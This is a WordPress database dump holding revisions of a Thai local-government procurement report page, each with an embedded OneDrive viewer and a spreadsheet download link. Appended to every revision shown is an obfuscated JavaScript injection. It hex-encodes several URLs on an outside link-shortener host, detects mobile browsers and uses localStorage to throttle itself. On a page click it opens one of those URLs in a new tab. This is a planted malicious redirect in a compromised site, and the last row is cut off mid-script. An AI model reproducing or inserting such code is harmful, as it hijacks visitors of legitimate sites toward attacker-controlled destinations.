(847,1,'2024-08-15 11:32:58','2024-08-15 04:32:58','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21142&authkey=!AKgnNha0_TYdbgU&em=2\" width=\"402\" height=\"346\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21142&authkey=!AKgnNha0_TYdbgU&em=2\" width=\"402\" height=\"346\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:file {\"id\":843,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\">รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ','','inherit','closed','closed','','840-revision-v1','','','2024-08-15 11:32:58','2024-08-15 04:32:58','',840,'http://pakhaeng.ssk.in.th/?p=847',0,'revision','',0),
(848,1,'2024-08-15 11:33:06','2024-08-15 04:33:06','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21142&authkey=!AKgnNha0_TYdbgU&em=2\" width=\"402\" height=\"346\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:file {\"id\":843,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\">รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ','','inherit','closed','closed','','840-revision-v1','','','2024-08-15 11:33:06','2024-08-15 04:33:06','',840,'http://pakhaeng.ssk.in.th/?p=848',0,'revision','',0),
(849,1,'2024-08-15 11:34:03','2024-08-15 04:34:03','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21142&authkey=!AKgnNha0_TYdbgU&em=2\" width=\"1500\" height=\"800\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:file {\"id\":843,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\">รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\